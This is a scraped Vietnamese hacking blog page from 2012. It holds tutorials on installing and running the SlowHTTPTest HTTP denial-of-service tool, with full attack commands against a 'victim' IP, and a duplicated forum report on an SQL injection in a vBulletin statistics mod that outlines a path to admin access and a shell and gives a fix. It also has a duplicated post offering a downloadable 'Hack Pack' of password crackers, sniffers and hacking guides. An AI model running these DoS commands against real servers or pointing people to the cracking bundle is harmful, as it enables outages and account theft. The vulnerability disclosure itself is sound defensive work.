Tuesday, October 23, 2012

Thử nghiệm khả năng chịu tải của Website với công cụ SlowHTTPTest

Chào các bạn, hôm nay mình sẽ giới thiệu với các bạn công cụ SlowHTTPTest, bản chất công cụ này là để thực hiện một tấn công HTTP DOS nên dĩ nhiên các bạn có thể sử dụng nó với mục đích tấn công. Tuy nhiên, theo chiều hướng ngược lại, các bạn cũng có thể sử dụng công cụ này để thử nghiệm khả năng chịu tải của webserver trước khi public web
Trước tiên tải về SlowHTTPTest bằng câu lệnh
wget http://slowhttptest.googlecode.com/files/slowhttptest-1.4.tar.gz
Xả nén
tar -zxvf slowhttptest-1.4.tar.gz
Cài đặt
cd slowhttptest-1.4
./configure
make
make install
Để sử dụng SlowHTTPTest, chúng ta sử dụng câu lệnh
slowhttptest -c 1000 -B -g -o output-file-name -i 100 -r 300 -s 10240 -u http://www.example.com/url/page.html -x 20
Giải thích câu lệnh trên
-c Số lượng các kết nối, theo pr của tác giả SlowHTTPTest thì phiên bản 1.4 này có thể tạo tới 64000 kết nối

-H, B,  Xác định chúng ta sẽ sử dụng phần gọi là “slow down” trong header hay trong body của gói tin

-g  Sinh output dạng csv, xml, html

-i  Thời gian giữa 2 connection

-o  Định ra đường dẫn, tên file, nếu sử dụng lựa chọn này thì phải có -g

-r  số lượng kết nối trong 1 giây

-s  giá trị byte trong trường  Content-Length, yêu cầu phải có -B trước

-u  target URL

-v  mức độ chi tiết, có các mức từ 0-4

-x  Độ lớn (byte) tối đa của dữ liệu gửi đến
Trước tiên ta thử với 1000 connection tới victim 192.168.0.180
slowhttptest -c 1000 -B -g -o ouput_dos -i 100 -r 300 -s 10240 -u 192.168.0.180 -x 20
Refresh page nào, dữ liệu chậm, nhưng mà vẫn load được:

Nâng số connection lên, opps:

Đây là output của quá trình tấn công


vào lúc No comments:

How to use SlowHTTPTest HTTP DoS Tool

Xem bài viết tiếng Việt tại đây:
http://junookyo.blogspot.com/2012/10/thu-nghiem-kha-nang-chiu-tai-cua.html
Introduction :
Slow HTTP DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. SlowHTTPTest is developed by Sergey Shekyan, Who is  Developer Web Application Scanning at Qualys.
This tool is enough capable to acquire resource on server side at application layer.
How to Install SlowHTTPTest?
wget http://slowhttptest.googlecode.com/files/slowhttptest-1.1.tar.gz
gunzip slowhttptest-1.1.tar.gz
tar xf slowhttptest-1.1.tar
cd slowhttptest-1.1
Configure & Compile it. You can use custom –prefix=your-location
./configure
make
make install

How To Use SlowHTTPTest for DoS?
slowhttptest -c 1000 -B -g -o output-file-name -i 100 -r 300 -s 10240 -u http://www.example.com/url/page.html -x 20
Detailed options :
-a start start value of ranges-specifier for range header test
-b bytes limit of range-specifier for range header test
-c number of connections limited to 1024
-H, B, or R specify to slow down in headers section or in message body.
            -R enables range test
-g generate statistics in CSV and HTML formats, pattern is slow_xxx.csv/html,
   where xxx is the time and date
-i seconds interval between follow up data in seconds, per connection
-l seconds test duration in seconds
-o file custom output file path and/or name, effective if -g is specified
-r connections per second connection rate
-s bytes value of Content-Length header, if -B specified
-t verb custom verb to use
-u URL target URL, the same format you type in browser, e.g https://host:port/
-v level verbosity level of log 0-4
-x bytes max length of follow up data
Troubleshooting :
configure: error: OpenSSL is missing
Install openssl devel package on backtrack(or any debian based distro)
aptitude install libssl-dev
On CEntOS Linux :
yum install openssl-devel
SlowHTTPTest Video Tutorial :

vào lúc No comments:

[Report] ChangUonDyU Advanced Statistics - SQL injection

Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được

Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static.
Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là
$_REQUEST['listforumid']

Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search VBB vì rất nhiều người đang sử dụng mod này).

Từ Bug này, chúng ta có thể lấy được dữ liệu từ database => Login vào admin => Login vào admincp => Up shell => blah blah

Ở đây DuyK sẽ không nói đến cách khai thác để đề phòng "Hacker chẻ châu" quậy phá mọi người (Hacker thực sự sẽ hiểu vấn đề ngay nên khỏi cần phải nói)

Vì rất nhiều người đang sử dụng mod này và chưa fix nên DuyK hi vọng mọi người sẽ lan truyền report này.

Để fix mod này. Các bạn vào: Admincp -> Plugin & product option -> Plugin manage -> ChangUonDyU - Advanced Statistics - Get Data -> EDIT

Bạn tìm đến dòng:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);

Thay bằng:
$foruminid = intval($_REQUEST['listforumid']);

Report từ: DaiCa.Net - Forum newbie học hỏi

P/S by Juno_okyo:

Rất nhiều Diễn đàn đang sử dụng mod Statstics này nên mọi người nhanh chóng fix nhé.
Bug này được phát hiện từ mod tương tự của bác Chang cho MyBB, kiểm tra thì thấy mod bên vBB cũng dính.
vào lúc No comments:

[Report] ChangUonDyU Advanced Statistics - SQL injection

Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được

Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static.
Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là
$_REQUEST['listforumid']

Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search VBB vì rất nhiều người đang sử dụng mod này).

Từ Bug này, chúng ta có thể lấy được dữ liệu từ database => Login vào admin => Login vào admincp => Up shell => blah blah

Ở đây DuyK sẽ không nói đến cách khai thác để đề phòng "Hacker chẻ châu" quậy phá mọi người (Hacker thực sự sẽ hiểu vấn đề ngay nên khỏi cần phải nói)

Vì rất nhiều người đang sử dụng mod này và chưa fix nên DuyK hi vọng mọi người sẽ lan truyền report này.

Để fix mod này. Các bạn vào: Admincp -> Plugin & product option -> Plugin manage -> ChangUonDyU - Advanced Statistics - Get Data -> EDIT

Bạn tìm đến dòng:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);

Thay bằng:
$foruminid = intval($_REQUEST['listforumid']);

Report từ: DaiCa.Net - Forum newbie học hỏi

P/S by Juno_okyo:

Rất nhiều Diễn đàn đang sử dụng mod Statstics này nên mọi người nhanh chóng fix nhé.
Bug này được phát hiện từ mod tương tự của bác Chang cho MyBB, kiểm tra thì thấy mod bên vBB cũng dính.
vào lúc No comments:

Hack Pack 3.2.135.68 ENG/2012




Hack Pack 3.2.135.68 ENG/2012 | 1.4 GB

Descriptions:-With this updated selection you can regain access to the system, retrieve a forgotten password to a file, instant messenger, website, mail ... Test the strength of the local network, a network of Wi-Fi, to learn something new for themselves in terms of network design, programs, etc. A selection of useful both network administrators and ordinary users.

Ingredients:
Bruteforce & Recovery
Advanced Archive Password Recovery Professional 4.53
Advanced EFS Data Recovery 4.0
Advanced IM Password Pecovery 4.10.297
Advanced Mailbox Password Recovery 1.9.2.223
Advanced Office Password Recovery Pro 5.04.547
Advanced PDF Password Recovery 5.04
Advanced RAR Password Recovery 1.53
Advanced Registry Tracer 2.11
Advanced SQL Password Recovery 1.01
Advanced ZIP Password Recovery 4.0
Brutus AET2
Dialupass 3.16
Elcomsoft Distributed Password Recovery 2.90.215
Elcomsoft Internet Password Breaker 2.0.306
Elcomsoft System Recovery Pro 3.0.466
Elcomsoft Wireless Security Auditor 4.0.211
Facebook Password Extractor 2.0
Lightning Hash Cracker 0.60
Passware Password Recovery Professional 11.1
Password Recovery Bundle 2011 1.80
PasswordsPro 3.1.1.0
Proactive Password Auditor 2.01
Proactive System Password Recovery 6.3.1.786
Product Key Explorer 2.8.6.0
WirelessKeyView 1.36

Scanners & Sniffers
Ace Password Sniffer 1.4
Aircrack-NG 1.1
Angry IP Scanner 3.0
DFind Fast Scanner GUI 2.3
Essential NetTools 4.3.259
ExploitMyUnion 2.1
LanTricks
Metasploit Pro 4.1.0
Safe3 SQL Injector 8.4
SoftPerfect Network Protocol Analyzer 2.7
SoftPerfect Network Scanner 5.3.2
TamoSoft CommView 6.1.636
TamoSoft CommView for WiFi 6.0.581
TamoSoft CommView for WiFi 6.0.585 VoIP
VisualRoute 2010 Pro 14
w3af 1.0
WEP Key Recovery 1.1.27
Wireshark 1.6.5

FAQ & Book
FAQ on Open Door Phone
Google Hacking
HACK-FAQ For Beginners
Hidden Radmin 3
SolarWinds Engineer Toolset Administrator Guide
SQL Injection. Breaking ASP + MSSQL
Administration and Security Linux
Internet address
Linux Security
Wireless Security
Breaking intercoms Metakom, Cyfral, Metacom, Eltis
Exploiting Software
AP Breaking Wi-Fi with WEP Encryption
AP Breaking Wi-Fi with WPA encryption
Types of Hackers
Virtual Wifi in Windows 7
Information Security
Local Area Networks
Wireless networks
Hacking Techniques
Guide for hackers
Network Administration
List of Ports and Description
Hacking Technique - Sockets, Exploits, Shell-code
Technology network attacks
Information Security Technology
Pull-pull uchetki with ADSL-router

Mã:
http://extabit.com/file/279lkb5sw5803/Pack_ENG_2012_By_LoriYagami.rar
Mirror :

Mã:
http://lumfile.com/e7jtivm4z1p0/Pack_ENG_2012_By_LoriYagami.rar.html
Mirror2 :

Mã:
http://www.netload.in/dateiKQRYLtL98C/Pack_ENG_2012_By_LoriYagami.rar.htm
Mirror3 :

Mã:
http://rapidgator.net/file/51346955/Pack_ENG_2012_By_LoriYagami.rar.html
Mirror4 :

Mã:
http://ryushare.com/2904a97c477f/Pack_ENG_2012_By_LoriYagami.rar
vào lúc No comments:

Hack Pack 3.2.135.68 ENG/2012




Hack Pack 3.2.135.68 ENG/2012 | 1.4 GB

Descriptions:-With this updated selection you can regain access to the system, retrieve a forgotten password to a file, instant messenger, website, mail ... Test the strength of the local network, a network of Wi-Fi, to learn something new for themselves in terms of network design, programs, etc. A selection of useful both network administrators and ordinary users.

Ingredients:
Bruteforce & Recovery
Advanced Archive Password Recovery Professional 4.53
Advanced EFS Data Recovery 4.0
Advanced IM Password Pecovery 4.10.297
Advanced Mailbox Password Recovery 1.9.2.223
Advanced Office Password Recovery Pro 5.04.547
Advanced PDF Password Recovery 5.04
Advanced RAR Password Recovery 1.53
Advanced Registry Tracer 2.11
Advanced SQL Password Recovery 1.01
Advanced ZIP Password Recovery 4.0
Brutus AET2
Dialupass 3.16
Elcomsoft Distributed Password Recovery 2.90.215
Elcomsoft Internet Password Breaker 2.0.306
Elcomsoft System Recovery Pro 3.0.466
Elcomsoft Wireless Security Auditor 4.0.211
Facebook Password Extractor 2.0
Lightning Hash Cracker 0.60
Passware Password Recovery Professional 11.1
Password Recovery Bundle 2011 1.80
PasswordsPro 3.1.1.0
Proactive Password Auditor 2.01
Proactive System Password Recovery 6.3.1.786
Product Key Explorer 2.8.6.0
WirelessKeyView 1.36

Scanners & Sniffers
Ace Password Sniffer 1.4
Aircrack-NG 1.1
Angry IP Scanner 3.0
DFind Fast Scanner GUI 2.3
Essential NetTools 4.3.259
ExploitMyUnion 2.1
LanTricks
Metasploit Pro 4.1.0
Safe3 SQL Injector 8.4
SoftPerfect Network Protocol Analyzer 2.7
SoftPerfect Network Scanner 5.3.2
TamoSoft CommView 6.1.636
TamoSoft CommView for WiFi 6.0.581
TamoSoft CommView for WiFi 6.0.585 VoIP
VisualRoute 2010 Pro 14
w3af 1.0
WEP Key Recovery 1.1.27
Wireshark 1.6.5

FAQ & Book
FAQ on Open Door Phone
Google Hacking
HACK-FAQ For Beginners
Hidden Radmin 3
SolarWinds Engineer Toolset Administrator Guide
SQL Injection. Breaking ASP + MSSQL
Administration and Security Linux
Internet address
Linux Security
Wireless Security
Breaking intercoms Metakom, Cyfral, Metacom, Eltis
Exploiting Software
AP Breaking Wi-Fi with WEP Encryption
AP Breaking Wi-Fi with WPA encryption
Types of Hackers
Virtual Wifi in Windows 7
Information Security
Local Area Networks
Wireless networks
Hacking Techniques
Guide for hackers
Network Administration
List of Ports and Description
Hacking Technique - Sockets, Exploits, Shell-code
Technology network attacks
Information Security Technology
Pull-pull uchetki with ADSL-router

Mã:
http://extabit.com/file/279lkb5sw5803/Pack_ENG_2012_By_LoriYagami.rar
Mirror :

Mã:
http://lumfile.com/e7jtivm4z1p0/Pack_ENG_2012_By_LoriYagami.rar.html
Mirror2 :

Mã:
http://www.netload.in/dateiKQRYLtL98C/Pack_ENG_2012_By_LoriYagami.rar.htm
Mirror3 :

Mã:
http://rapidgator.net/file/51346955/Pack_ENG_2012_By_LoriYagami.rar.html
Mirror4 :

Mã:
http://ryushare.com/2904a97c477f/Pack_ENG_2012_By_LoriYagami.rar
vào lúc No comments: